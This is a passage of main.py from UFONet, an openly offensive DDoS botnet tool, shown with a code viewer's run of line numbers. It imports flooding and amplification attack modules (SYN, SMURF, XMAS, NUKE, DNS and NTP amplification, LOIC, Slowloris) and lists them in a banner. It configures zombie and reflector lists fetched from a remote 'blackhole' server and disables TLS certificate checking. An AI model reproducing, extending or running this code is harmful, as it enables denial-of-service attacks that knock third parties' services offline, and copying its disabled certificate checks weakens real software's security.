main.py 250 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273127412751276127712781279128012811282128312841285128612871288128912901291129212931294129512961297129812991300130113021303130413051306130713081309131013111312131313141315131613171318131913201321132213231324132513261327132813291330133113321333133413351336133713381339134013411342134313441345134613471348134913501351135213531354135513561357135813591360136113621363136413651366136713681369137013711372137313741375137613771378137913801381138213831384138513861387138813891390139113921393139413951396139713981399140014011402140314041405140614071408140914101411141214131414141514161417141814191420142114221423142414251426142714281429143014311432143314341435143614371438143914401441144214431444144514461447144814491450145114521453145414551456145714581459146014611462146314641465146614671468146914701471147214731474147514761477147814791480148114821483148414851486148714881489149014911492149314941495149614971498149915001501150215031504150515061507150815091510151115121513151415151516151715181519152015211522152315241525152615271528152915301531153215331534153515361537153815391540154115421543154415451546154715481549155015511552155315541555155615571558155915601561156215631564156515661567156815691570157115721573157415751576157715781579158015811582158315841585158615871588158915901591159215931594159515961597159815991600160116021603160416051606160716081609161016111612161316141615161616171618161916201621162216231624162516261627162816291630163116321633163416351636163716381639164016411642164316441645164616471648164916501651165216531654165516561657165816591660166116621663166416651666166716681669167016711672167316741675167616771678167916801681168216831684168516861687168816891690169116921693169416951696169716981699170017011702170317041705170617071708170917101711171217131714171517161717171817191720172117221723172417251726172717281729173017311732173317341735173617371738173917401741174217431744174517461747174817491750175117521753175417551756175717581759176017611762176317641765176617671768176917701771177217731774177517761777177817791780178117821783178417851786178717881789179017911792179317941795179617971798179918001801180218031804180518061807180818091810181118121813181418151816181718181819182018211822182318241825182618271828182918301831183218331834183518361837183818391840184118421843184418451846184718481849185018511852185318541855185618571858185918601861186218631864186518661867186818691870187118721873187418751876187718781879188018811882188318841885188618871888188918901891189218931894189518961897189818991900190119021903190419051906190719081909191019111912191319141915191619171918191919201921192219231924192519261927192819291930193119321933193419351936193719381939194019411942194319441945194619471948194919501951195219531954195519561957195819591960196119621963196419651966196719681969197019711972197319741975197619771978197919801981198219831984198519861987198819891990199119921993199419951996199719981999200020012002200320042005200620072008200920102011201220132014201520162017201820192020202120222023202420252026202720282029203020312032203320342035203620372038203920402041204220432044204520462047204820492050205120522053205420552056205720582059206020612062206320642065206620672068206920702071207220732074207520762077207820792080208120822083208420852086208720882089209020912092209320942095209620972098209921002101210221032104210521062107210821092110211121122113211421152116211721182119212021212122212321242125212621272128212921302131213221332134213521362137213821392140214121422143214421452146214721482149215021512152215321542155215621572158215921602161216221632164216521662167216821692170217121722173217421752176217721782179218021812182218321842185218621872188218921902191219221932194219521962197219821992200220122022203220422052206220722082209221022112212221322142215221622172218221922202221222222232224222522262227222822292230223122322233223422352236223722382239224022412242224322442245224622472248224922502251225222532254225522562257225822592260226122622263226422652266226722682269227022712272227322742275227622772278227922802281228222832284228522862287228822892290229122922293229422952296229722982299230023012302230323042305230623072308230923102311231223132314231523162317231823192320232123222323232423252326232723282329233023312332233323342335233623372338233923402341234223432344234523462347234823492350235123522353235423552356235723582359236023612362236323642365236623672368236923702371237223732374237523762377237823792380238123822383238423852386238723882389239023912392239323942395239623972398239924002401240224032404240524062407240824092410241124122413241424152416241724182419242024212422242324242425242624272428242924302431243224332434243524362437243824392440244124422443244424452446244724482449245024512452245324542455245624572458245924602461246224632464246524662467246824692470247124722473247424752476247724782479248024812482248324842485248624872488248924902491249224932494249524962497249824992500250125022503250425052506250725082509251025112512251325142515251625172518251925202521252225232524252525262527252825292530253125322533253425352536253725382539254025412542254325442545254625472548254925502551255225532554255525562557255825592560256125622563256425652566256725682569257025712572257325742575257625772578257925802581258225832584258525862587258825892590259125922593259425952596259725982599260026012602260326042605260626072608260926102611261226132614261526162617261826192620262126222623262426252626262726282629263026312632263326342635263626372638263926402641264226432644264526462647264826492650265126522653265426552656265726582659266026612662266326642665266626672668266926702671267226732674267526762677267826792680268126822683268426852686268726882689269026912692269326942695269626972698269927002701270227032704270527062707270827092710271127122713271427152716271727182719272027212722272327242725272627272728272927302731273227332734273527362737273827392740274127422743274427452746274727482749275027512752275327542755275627572758275927602761276227632764276527662767276827692770277127722773277427752776277727782779278027812782278327842785278627872788278927902791279227932794279527962797279827992800280128022803280428052806280728082809281028112812281328142815281628172818281928202821282228232824282528262827282828292830283128322833283428352836283728382839284028412842284328442845284628472848284928502851285228532854285528562857285828592860286128622863286428652866286728682869287028712872287328742875287628772878287928802881288228832884288528862887288828892890289128922893289428952896289728982899290029012902290329042905290629072908290929102911291229132914291529162917291829192920292129222923292429252926292729282929293029312932293329342935293629372938293929402941294229432944294529462947294829492950295129522953295429552956295729582959296029612962296329642965296629672968296929702971297229732974297529762977297829792980298129822983298429852986298729882989299029912992299329942995299629972998299930003001300230033004300530063007300830093010301130123013301430153016301730183019302030213022302330243025302630273028302930303031303230333034303530363037303830393040304130423043304430453046304730483049305030513052305330543055305630573058305930603061306230633064306530663067306830693070307130723073307430753076307730783079308030813082308330843085308630873088308930903091309230933094309530963097309830993100310131023103310431053106310731083109311031113112311331143115311631173118311931203121312231233124312531263127312831293130313131323133313431353136313731383139314031413142314331443145314631473148314931503151315231533154315531563157315831593160316131623163316431653166316731683169317031713172317331743175317631773178317931803181318231833184318531863187318831893190319131923193319431953196319731983199320032013202320332043205320632073208320932103211321232133214321532163217321832193220322132223223322432253226322732283229323032313232323332343235323632373238323932403241324232433244324532463247324832493250325132523253325432553256325732583259326032613262326332643265326632673268326932703271327232733274327532763277327832793280328132823283328432853286328732883289329032913292329332943295329632973298329933003301330233033304330533063307330833093310331133123313331433153316331733183319332033213322332333243325332633273328332933303331333233333334333533363337333833393340334133423343334433453346334733483349335033513352335333543355335633573358335933603361336233633364336533663367336833693370337133723373337433753376337733783379338033813382338333843385338633873388338933903391339233933394339533963397339833993400340134023403340434053406340734083409341034113412341334143415341634173418341934203421342234233424342534263427342834293430343134323433343434353436343734383439344034413442344334443445344634473448344934503451345234533454345534563457345834593460346134623463346434653466346734683469347034713472347334743475347634773478347934803481348234833484348534863487348834893490349134923493349434953496349734983499350035013502350335043505350635073508350935103511351235133514351535163517351835193520352135223523352435253526352735283529353035313532353335343535353635373538353935403541354235433544354535463547354835493550355135523553355435553556355735583559356035613562356335643565356635673568356935703571357235733574357535763577357835793580358135823583358435853586358735883589359035913592359335943595359635973598359936003601360236033604360536063607360836093610361136123613361436153616361736183619362036213622362336243625362636273628362936303631363236333634363536363637363836393640364136423643364436453646364736483649365036513652365336543655365636573658365936603661366236633664366536663667366836693670367136723673367436753676367736783679368036813682368336843685368636873688368936903691369236933694369536963697369836993700370137023703370437053706370737083709371037113712371337143715371637173718371937203721372237233724372537263727372837293730373137323733373437353736373737383739374037413742374337443745374637473748374937503751375237533754375537563757375837593760376137623763376437653766376737683769377037713772377337743775377637773778377937803781378237833784378537863787378837893790379137923793379437953796379737983799380038013802380338043805380638073808380938103811381238133814381538163817381838193820382138223823382438253826382738283829383038313832383338343835383638373838383938403841384238433844384538463847384838493850385138523853385438553856385738583859386038613862386338643865386638673868386938703871387238733874387538763877387838793880388138823883388438853886388738883889389038913892389338943895389638973898389939003901390239033904390539063907390839093910391139123913391439153916391739183919392039213922392339243925392639273928392939303931393239333934393539363937393839393940394139423943394439453946394739483949395039513952395339543955395639573958395939603961396239633964396539663967396839693970397139723973397439753976397739783979398039813982398339843985398639873988398939903991399239933994399539963997399839994000400140024003400440054006400740084009401040114012401340144015401640174018401940204021402240234024402540264027402840294030403140324033403440354036403740384039404040414042404340444045404640474048404940504051405240534054405540564057405840594060406140624063406440654066406740684069407040714072407340744075407640774078407940804081408240834084408540864087408840894090409140924093409440954096409740984099410041014102410341044105410641074108410941104111411241134114411541164117411841194120412141224123412441254126412741284129413041314132413341344135413641374138413941404141414241434144414541464147414841494150415141524153415441554156415741584159416041614162416341644165416641674168416941704171417241734174417541764177417841794180418141824183418441854186418741884189419041914192419341944195419641974198419942004201420242034204420542064207420842094210421142124213421442154216421742184219422042214222422342244225422642274228422942304231423242334234423542364237423842394240424142424243424442454246424742484249425042514252425342544255425642574258425942604261426242634264426542664267426842694270427142724273427442754276427742784279428042814282428342844285428642874288428942904291429242934294429542964297429842994300430143024303430443054306430743084309431043114312431343144315431643174318431943204321432243234324432543264327432843294330433143324333433443354336433743384339434043414342434343444345434643474348434943504351435243534354435543564357435843594360436143624363436443654366436743684369437043714372437343744375437643774378437943804381438243834384438543864387438843894390439143924393439443954396439743984399440044014402440344044405440644074408440944104411441244134414441544164417441844194420442144224423442444254426442744284429443044314432443344344435443644374438443944404441444244434444444544464447444844494450445144524453445444554456445744584459446044614462446344644465446644674468446944704471447244734474447544764477447844794480448144824483448444854486448744884489449044914492449344944495449644974498449945004501450245034504450545064507450845094510451145124513451445154516451745184519452045214522452345244525452645274528452945304531453245334534453545364537453845394540454145424543454445454546454745484549455045514552455345544555455645574558455945604561456245634564456545664567456845694570457145724573457445754576457745784579458045814582458345844585458645874588458945904591459245934594459545964597459845994600460146024603460446054606460746084609461046114612461346144615461646174618461946204621462246234624462546264627462846294630463146324633463446354636463746384639464046414642464346444645464646474648464946504651465246534654465546564657465846594660466146624663466446654666466746684669467046714672467346744675467646774678467946804681468246834684468546864687468846894690469146924693469446954696469746984699470047014702470347044705470647074708470947104711471247134714471547164717471847194720472147224723472447254726472747284729473047314732473347344735473647374738473947404741474247434744474547464747474847494750475147524753475447554756475747584759476047614762476347644765476647674768476947704771477247734774477547764777477847794780478147824783478447854786478747884789479047914792479347944795479647974798479948004801480248034804480548064807480848094810481148124813481448154816481748184819482048214822482348244825482648274828482948304831483248334834483548364837483848394840484148424843484448454846484748484849485048514852485348544855485648574858485948604861486248634864486548664867486848694870487148724873487448754876487748784879488048814882488348844885488648874888488948904891489248934894489548964897489848994900490149024903490449054906490749084909491049114912491349144915491649174918491949204921492249234924492549264927492849294930493149324933493449354936493749384939494049414942494349444945494649474948494949504951495249534954495549564957495849594960496149624963496449654966496749684969497049714972497349744975497649774978497949804981498249834984498549864987498849894990499149924993499449954996499749984999500050015002500350045005500650075008500950105011501250135014501550165017501850195020
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import os, sys, re, traceback, random, time, threading, base64, string, math
  11. import io, socket, ssl, cgi, json, gzip
  12. try:
  13. from urllib.parse import urlparse as urlparse
  14. except:
  15. from urlparse import urlparse as urlparse
  16. try:
  17. import urllib.request, urllib.error, urllib.parse
  18. except:
  19. print ("\n[Error] UFONet no longer supports Python2: (https://www.python.org/doc/sunset-python-2/)\n\n[Info] [AI] Try to run the tool with Python3.x.y (ex: python3 ufonet)\n")
  20. sys.exit()
  21. from uuid import getnode
  22. from random import randrange, shuffle
  23. from .options import UFONetOptions
  24. from .update import Updater
  25. from .herd import Herd
  26. from .zombie import Zombie
  27. from .doll import Doll
  28. from core.tools.inspector import Inspector
  29. from core.tools.abductor import Abductor
  30. from core.tools.ufoscan import UFOSCAN
  31. from core.mods.loic import LOIC
  32. from core.mods.loris import LORIS
  33. from core.mods.ufosyn import UFOSYN
  34. from core.mods.spray import SPRAY
  35. from core.mods.smurf import SMURF
  36. from core.mods.xmas import XMAS
  37. from core.mods.nuke import NUKE
  38. from core.mods.tachyon import TACHYON
  39. from core.mods.monlist import MONLIST
  40. DEBUG = False # switch to 'True' for detailed traceback errors
  41. class UFONet(object):
  42. def __init__(self):
  43. self.exit_msg = 'Donate BTC (Bitcoin) to keep UFONet (https://ufonet.03c8.net) strong!' # set msg show at the end [FILO ;-)]
  44. self.blackhole = '176.28.23.46' # default download/upload zombies [Blackhole] [Server] / Try [DIY] your own [Mirror]...
  45. self.GIT_REPOSITORY = 'https://code.03c8.net/epsylon/ufonet' # oficial code source [OK! 22/12/2018]
  46. self.GIT_REPOSITORY2 = 'https://github.com/epsylon/ufonet' # mirror source [since: 04/06/2018]
  47. self.github_zombies = 'https://raw.githubusercontent.com/epsylon/ufonet/master/botnet/' # default [RAW] download/upload zombies [Blackhole] [GitHub] [DIY]
  48. self.external_check_service1 = 'https://status.ws/' # set external check service 1 [OK! 26/02/2020]
  49. self.external_check_service2 = 'https://downforeveryoneorjustme.com/' # set external check service 2 [OK! 26/02/2020]
  50. self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
  51. self.check_ip_service1 = 'https://checkip.dyndns.com/' # set external check ip service 1 [OK! 28/02/2019]
  52. self.check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 28/02/2019]
  53. self.check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! 28/02/2019]
  54. self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
  55. self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
  56. self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve [Zombies]
  57. self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve [Aliens]
  58. self.dnss_file = 'botnet/dns.txt' # set source path to retrieve [DNSs]
  59. self.droids_file = 'botnet/droids.txt' # set source path to retrieve [Droids]
  60. self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs'
  61. self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs'
  62. self.ntps_file = 'botnet/ntp.txt' # set source path to retrieve [NTPs]
  63. self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans'
  64. self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve [Dorks]
  65. self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
  66. self.timeline_file = 'docs/VERSION' # set source for code releases
  67. self.news_file = "data/news.txt" # set source path to retrieve [Blackhole] [News]
  68. self.missions_file = "data/missions.txt" # set source path to retrieve [Blackhole] [Missions]
  69. self.board_file = "data/board.txt" # set source path to retrieve [Blackhole] [Board]
  70. self.grid_file = "data/grid.txt" # set source path to retrieve [Blackhole] [Grid]
  71. self.wargames_file = "data/wargames.txt" # set source path to retrieve [Blackhole] [Wargames]
  72. self.examples_file = "docs/examples.txt" # set source path to retrieve [Examples]
  73. self.misc_file = "core/txt/misc.txt" # set source path to retrieve [Miscellania] cites
  74. self.referer = '' # black magic
  75. self.port = "8080" # default injection port
  76. self.mothershipname = "core/txt/shipname.txt"
  77. self.mothership_baptism() # generating static name/id for your mothership ;-)
  78. self.head = False
  79. self.payload = False
  80. self.external = False
  81. self.attack_mode = False
  82. self.connection_failed = False
  83. self.total_possible_zombies = 0
  84. self.herd = Herd(self)
  85. self.sem = False
  86. self.db_flash = 0 # db stress counter
  87. self.total_aliens = 0
  88. self.aliens_hit = 0
  89. self.aliens_fail = 0
  90. self.total_droids = 0
  91. self.droids_hit = 0
  92. self.droids_fail = 0
  93. self.total_ucavs = 0
  94. self.ucavs_hit = 0
  95. self.ucavs_fail = 0
  96. self.total_rpcs = 0
  97. self.rpcs_hit = 0
  98. self.rpcs_fail = 0
  99. self.total_loic = 0
  100. self.total_loris = 0
  101. self.total_syn = 0
  102. self.total_spray = 0
  103. self.total_smurf = 0
  104. self.total_xmas = 0
  105. self.total_nuke = 0
  106. self.total_tachyon = 0
  107. self.total_monlist = 0
  108. self.total_zombies_failed_connection = 0
  109. self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic)
  110. self.ctx.check_hostname = False
  111. self.ctx.verify_mode = ssl.CERT_NONE
  112. self.nat_error_flag = "OFF"
  113. self.trans_zombies = 0
  114. self.scanned_zombies = 0
  115. self.loadcheck_counter = 0
  116. self.loadcheck_prev_size = None
  117. self.loadcheck_prev_load = None
  118. self.loadcheck_first_size = None
  119. self.loadcheck_first_load = None
  120. self.loadcheck_size_list = []
  121. self.loadcheck_load_list = []
  122. self.loadcheck_size_median = None
  123. self.loadcheck_size_max = None
  124. self.loadcheck_size_min = None
  125. self.loadcheck_load_median = None
  126. self.loadcheck_size_max = None
  127. self.loadcheck_size_min = None
  128. self.num_is_up = 0 # counter for [UCAVs] 'up' reports
  129. self.num_is_down = 0 # counter for [UCAVs] 'down' reports
  130. self.expire_timing = 30 # default expiring time per round
  131. self.extra_zombies_lock = False # used to lock threading flow when [ARMY] is required
  132. self.ac_control = [] # used by 'herd.py' to lock threading flow when [Zombies] are returning
  133. def mothership_baptism(self):
  134. if os.path.exists(self.mothershipname) == True:
  135. f = open(self.mothershipname)
  136. self.mothership_id = f.read()
  137. f.close()
  138. else:
  139. self.mothership_ids = []
  140. f = open(self.motherships_file)
  141. motherships = f.readlines()
  142. f.close()
  143. for ship in motherships:
  144. ship = ship.encode("utf-8")
  145. self.mothership_ids.append(base64.urlsafe_b64encode(ship))
  146. self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()), 'utf-8')
  147. m = open(self.mothershipname, "w") # write mothership name to a static file as a baptism
  148. m.write(str(self.mothership_id.upper()))
  149. m.close()
  150. def create_options(self, args=None):
  151. self.optionParser = UFONetOptions()
  152. self.options = self.optionParser.get_options(args)
  153. if not self.options:
  154. return False
  155. return self.options
  156. def banner_welcome(self):
  157. print("")
  158. print(" 0=============================================0")
  159. print(" || ||")
  160. print(" || || || * Botnet -> [DDoS]: ||")
  161. print(" -(00)- -(00)- || /Zombies : HTTP GET bots ||")
  162. print(" || (00) || || /Droids : HTTP GET (+params) bots ||")
  163. print(" (O)_ (O) 0'----'0 (O) _(O) || /Aliens : HTTP POST bots ||")
  164. print(" | |.''.( xx ).''.| | || /UCAVs : Web Abusing bots ||")
  165. print(" .'.' X|'..'|X '.'. || /X-RPCs : XML-RPC bots ||")
  166. print(" .-. .' /'--.__|_00_|__.--'\ '. .-. || /DBSTRESS: HTTP DB attack ||")
  167. print(" (O).)-|0| \ x| ## |x / |0|-(.(O) || /SPRAY : TCP-SYN reflector ||")
  168. print(" `-' '-'-._'-./ -00- \.-'_.-'-' `-' || /SMURF : ICMP echo flooder ||")
  169. print(" _ | || '-.___||___.-' || | _ || /TACHYON : DNS amplificator ||")
  170. print(" .' _ | ||==O | __ | O==|| | _ '. || /MONLIST : NTP amplificator ||")
  171. print(" / .' ''.| || | /_00_\ | || |.'' '. \ || ||")
  172. print(" | '### | =| | ###### | |= |' ### | || * Close Combat -> [DoS]: ||")
  173. print(" | |(0)| '. 0\||__**_ ||/0 .' |(0)| | || /LOIC : Fast HTTP requests ||")
  174. print(" \ '._.' '. | \_##_/ | .' '._.' / || /LORIS : Slow HTTP requests ||")
  175. print(" '.__ ____0_'.|__'--'__|.'_0____ __.' || /UFOSYN : TCP-SYN flooder ||")
  176. print(" .'_.-| |-._'. || /XMAS : TCP-XMAS flooder ||")
  177. print(" || /NUKE : TCP-STARVATION attack ||")
  178. print(" + Class: UFONet / ViPR404+ (model G) + || ||")
  179. print(" 0|===========================================|0")
  180. print("")
  181. def banner(self):
  182. print('='*75, "\n")
  183. print("888 888 8888888888 .d88888b. 888b 888 888 ")
  184. print("888 888 888 d88P Y888b 8888b 888 888 ")
  185. print("888 888 888 888 888 88888b 888 888 ")
  186. print("888 888 8888888 888 888 888Y88b 888 .d88b. 888888 ")
  187. print("888 888 888 888 888 888 Y88b888 d8P Y8b 888 ")
  188. print("888 888 888 888 888 888 Y88888 88888888 888 ")
  189. print("Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. ")
  190. print(" 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888")
  191. print(self.optionParser.description, "\n")
  192. print('='*75)
  193. def generate_exit_msg(self):
  194. f = open(self.misc_file)
  195. m = f.readlines()
  196. f.close()
  197. self.exit_msg = "Generating random exit... \n\n"
  198. self.exit_msg += " -> "+str(random.choice(m).strip())
  199. def AI(self):
  200. try:
  201. import turtle as AI
  202. print("\n[AI] Making a unique drawing using 'Turtle' (Feurzig & Papert - 1966) -> [OK!]\n")
  203. colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
  204. bg = random.choice(colors).strip()
  205. t = AI.Pen()
  206. AI.bgcolor(bg)
  207. r = random.randrange(100,100000)
  208. for x in range(r):
  209. t.pencolor(colors[x%6])
  210. w = random.randrange(100,1000)
  211. t.width(x/w + 1)
  212. t.forward(x)
  213. l = random.randrange(50,1000)
  214. t.left(l)
  215. except:
  216. print("[AI] %!$1#9#84#~... -> [Exiting!]")
  217. pass
  218. def round_float(self, num):
  219. return str(int(round(num, -1)))[2] # black magic
  220. def show_mac_address(self):
  221. mac = getnode() # to get physical address
  222. hex_mac = str(":".join(re.findall('..', '%012x' % mac)))
  223. return hex_mac
  224. def show_ips(self):
  225. import requests
  226. try:
  227. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  228. s.connect(("8.8.8.8", 80))
  229. private_ip = s.getsockname()[0] # black magic
  230. s.close()
  231. except:
  232. private_ip = "Unknown"
  233. try:
  234. public_ip = requests.get(self.check_ip_service3).text
  235. except:
  236. try:
  237. public_ip = requests.get(self.check_ip_service2).text
  238. except:
  239. try:
  240. public_ip = requests.get(self.check_ip_service1).text
  241. except:
  242. public_ip = "Unknown"
  243. return private_ip, public_ip
  244. def try_running(self, func, error, args=None):
  245. options = self.options
  246. args = args or []
  247. try:
  248. return func(*args)
  249. except Exception as e:
  250. if DEBUG == True:
  251. print(error, "error")
  252. traceback.print_exc()
  253. def checkeuid(self):
  254. try:
  255. euid = os.geteuid()
  256. except:
  257. print("[Error] [AI] [UFONet] doesn't work correctly in systems with closed licenses...-> [Exiting!]\n")
  258. print("[AI] "+self.exit_msg+"\n")
  259. sys.exit(2) # return
  260. return euid
  261. def start_ship_engine(self):
  262. self.agents = [] # generating available user-agents
  263. f = open(self.agents_file)
  264. agents = f.readlines()
  265. f.close()
  266. for agent in agents:
  267. self.agents.append(agent)
  268. self.user_agent = random.choice(self.agents).strip()
  269. self.search_engines = [] # available dorking search engines
  270. self.search_engines.append('bing') # [01/02/2020: OK!]
  271. self.search_engines.append('yahoo') # [01/02/2020: OK!]
  272. self.search_engines.append('duck') # [01/02/2020: OK!]
  273. #self.search_engines.append('startpage') # [01/02/2020: deprecated! -> blocking instream params search]
  274. #self.search_engines.append('yandex') # [03/02/2018: deprecated! -> captchasound]
  275. #self.search_engines.append('google') # [09/08/2016: modified -> not working from TOR]
  276. if not os.path.exists("core/json/"): # create gui json cfg files folder
  277. os.mkdir("core/json/")
  278. self.banner_welcome()
  279. self.update_flying_stats() # update flying time stats
  280. chargo = self.check_mothership_chargo() # check mothership chargo
  281. self.update_max_chargo(int(chargo)) # update max chargo stats
  282. self.generate_exit_msg() # generate random exit msg
  283. def run(self, opts=None):
  284. if opts:
  285. self.create_options(opts)
  286. options = self.options
  287. # start threads
  288. if not self.options.threads:
  289. self.options.threads=5 # default number of threads
  290. self.sem = threading.Semaphore(self.options.threads)
  291. # start ship engine
  292. self.start_ship_engine()
  293. # check proxy options
  294. proxy = options.proxy
  295. if options.proxy:
  296. try:
  297. pattern = 'http[s]?://(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]):[0-9][0-9][0-9][0-9]'
  298. m = re.search(pattern, proxy)
  299. if m is None:
  300. self.banner()
  301. print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
  302. return
  303. else:
  304. self.proxy_transport(options.proxy) # create proxy transport (also here, to be sure)
  305. except Exception:
  306. self.banner()
  307. print ("\n[Error] [AI] Proxy malformed! (ex: 'http(s)://127.0.0.1:8118') -> [Exiting!]\n")
  308. return
  309. # check tor connection
  310. if options.checktor:
  311. url = self.check_tor_url # TOR status checking site
  312. self.banner()
  313. print("\nSending request to: " + url + "\n")
  314. self.user_agent = random.choice(self.agents).strip() # shuffle user-agent
  315. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
  316. try:
  317. if options.proxy: # set proxy
  318. self.proxy_transport(options.proxy)
  319. req = urllib.request.Request(url, None, headers)
  320. tor_reply = urllib.request.urlopen(req, context=self.ctx).read().decode('utf-8')
  321. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
  322. if not tor_reply or 'Congratulations' not in tor_reply:
  323. print("It seems that Tor is not properly set.\n")
  324. print(("IP address appears to be: " + your_ip + "\n"))
  325. else:
  326. print("Congratulations!. Tor is properly being used :-)\n")
  327. print(("IP address appears to be: " + your_ip + "\n"))
  328. except:
  329. print("Cannot reach TOR checker system!. Are you correctly connected?\n")
  330. sys.exit(2) # return
  331. # run AES256+HMAC-SHA1 enc/dec tool
  332. if options.cryptomsg:
  333. from core.tools.crypter import Cipher
  334. print(" " + '='*44)
  335. print(" ")
  336. print(" ____...------------...____ ")
  337. print(" _.-'' /o/__ ____ __ __ __ \o\_`'-._ ")
  338. print(" .' / / \ \ '. ")
  339. print(" |=====/o/======================\o\=====| ")
  340. print(" |____/_/________..____..________\_\____| ")
  341. print(" / _/ \_ <_o#\__/#o_> _/ \_ \ ")
  342. print(" \__/_____\####/0213411543/####/_____\__/ ")
  343. print(" |===\!/========================\!/===| ")
  344. print(" | |=| .---. |=| | ")
  345. print(" |===|o|=========/ \========|o|===| ")
  346. print(" | | | \() ()/ | | | ")
  347. print(" |===|o|======{'-.) A (.-'}=====|o|===| ")
  348. print(" | __/ \__ '-.\\uuu/.-' __/ \__ | ")
  349. print(" |==== .'.'^'.'.====|====.'.'^'.'.====| ")
  350. print(" | _\o/ __ {.' __ '.} _ _\o/ _| ")
  351. print(" '''''''''''''''''''''''''''''''''''''' ")
  352. print("\n + UFONet Crypter (AES256+HMAC-SHA1)")
  353. print(" (140 plain text chars = 69 encrypted chars)\n")
  354. print(" " + '='*44 + "\n")
  355. text = str(input("-> Enter TEXT: "))
  356. input_key = str(input("\n-> Enter KEY: "))
  357. key = base64.b64encode(input_key.encode('utf-8')).decode('utf-8')
  358. c = Cipher(key, text)
  359. msg = c.encrypt()
  360. msg = msg.decode('utf-8')
  361. c.set_text(msg)
  362. print("\n" + " " + '-'*44)
  363. print('\n-> Ciphertext: [', msg, ']')
  364. print('\n-> Length:', len(msg))
  365. print("\n" + " " + '-'*44)
  366. print('\n-> Key (share it using SNEAKNET!):', input_key)
  367. print('\n-> Decryption PoC:', c.decrypt().decode('utf-8'), "\n")
  368. # run shownet tool
  369. if options.shownet:
  370. hex_mac = self.show_mac_address()
  371. self.banner()
  372. print("-> Network Info:")
  373. print('='*44)
  374. print("-"*35)
  375. print("|- MAC Address :", hex_mac)
  376. print("|" +"-"*34)
  377. private_ip, public_ip = self.show_ips()
  378. print("|- IP Private :", private_ip)
  379. print("|" +"-"*34)
  380. t = urlparse(self.check_ip_service3)
  381. name_service = t.netloc
  382. print("|- IP Public :", public_ip +" | ["+name_service+"]")
  383. print("-"*35)
  384. print('='*75, "\n")
  385. # run UFOSCAN tool (check EUID when running UFOSCAN)
  386. if options.xray:
  387. euid = self.checkeuid()
  388. if euid != 0:
  389. print("[Info] [AI] [Control] [UFOSCAN] (--xray) not started as root...\n")
  390. try:
